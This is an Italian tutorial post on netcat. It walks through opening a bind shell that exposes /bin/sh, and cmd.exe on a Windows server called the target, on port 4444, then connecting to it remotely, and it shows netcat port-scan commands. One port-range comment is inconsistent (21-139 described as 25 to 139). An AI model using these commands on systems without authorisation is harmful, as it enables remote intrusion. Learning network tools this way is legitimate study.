Guida Netcat, comandi computer da remoto

Guida Netcat il coltellino Svizzero

piccola guida italiano a netcat

 Guida Netcat, un altro gioiellino che non deve mancare nel vostro bagaglio di software di test e che comunque e’ presente in Backtrack 5. Nel menù Information Gathering > Network Analysis > Service Fingerprinting > ncat. Il programma e’ solo a riga di comando e ne esiste una versione anche per windows.
E’ molto semplice da usare, si tratta lanciarne uno su un computer server in ascolto ( listen ) su una porta da noi decisa esempio la porta 4444. Sull’altro host impartiremo i comandi.
Una cosa facile facile facciamone una prova, abbiamo due computer in una rete wireless, computer 1,  192.168.0.100  e computer 2,  192.168.0.101.

guida netcat

Nel computer 1

apriamo la shell di Netcat e mettiamo in listen mode (ascolto) e con /bin/sh diamo la possibilità di ricevere comandi, in questo modo, digitando:

nc -l -p 4444 -e /bin/sh

Nel computer 2, apriamo sempre Netcat e ci colleghiamo al computer 1 tramite la porta 4444 che in questo caso sta aspettando che qualcuno si colleghi, digitiamo:

nc 192.168.0.100 4444

Guida Netcat, ora siamo collegati e adesso possiamo impartire comandi dalla console computer 1 verso la console del computer 2. Esempio aprire una shell e diventare root e molto altro, ma oltre che a impartire comandi, si possono trasferire file. Modificare e cancellare file e più conoscenza si ha, più cose disparate si possono fare, quindi un consiglio, provate e riprovate e riuscirete a capire.
Ricordo inoltre che con Netcat non e’ possibile impostare password quindi tutte le informazioni che passano se non criptate passeranno in chiaro e quindi visibili a chi per sbaglio si imbatte nella vostra rete trovando la porta aperta da voi destinata a Netcat.

Alcuni esempi:
Se il server da attaccare e’ Windows il comando per il server sara’:

nc -l -p 4444 -t -e cmd.exe

quando mi collegherò avrò nella mia shell una console di Microsoft Windows in modalità dos da dove impartire comandi.

Guida nNetcat e port Scan

nc -v -z www.nomesito.it 21 139 (per due singole porte)
nc -v -z www.nomesito.it 21-139 (per tutte le porte dal 25 al 139)

non e’ uno scanner  velocissimo ma sicuramente efficace.
Fate buon uso di questa guida pubblicata solo a scopo didattico, provate sulla vostra rete o domini, non mi assumo nessuna responsabilità dell’uso che ne farete.

Scarica Cain & Abel dal sito

Scopri le password vulnerabili con Cain & Abel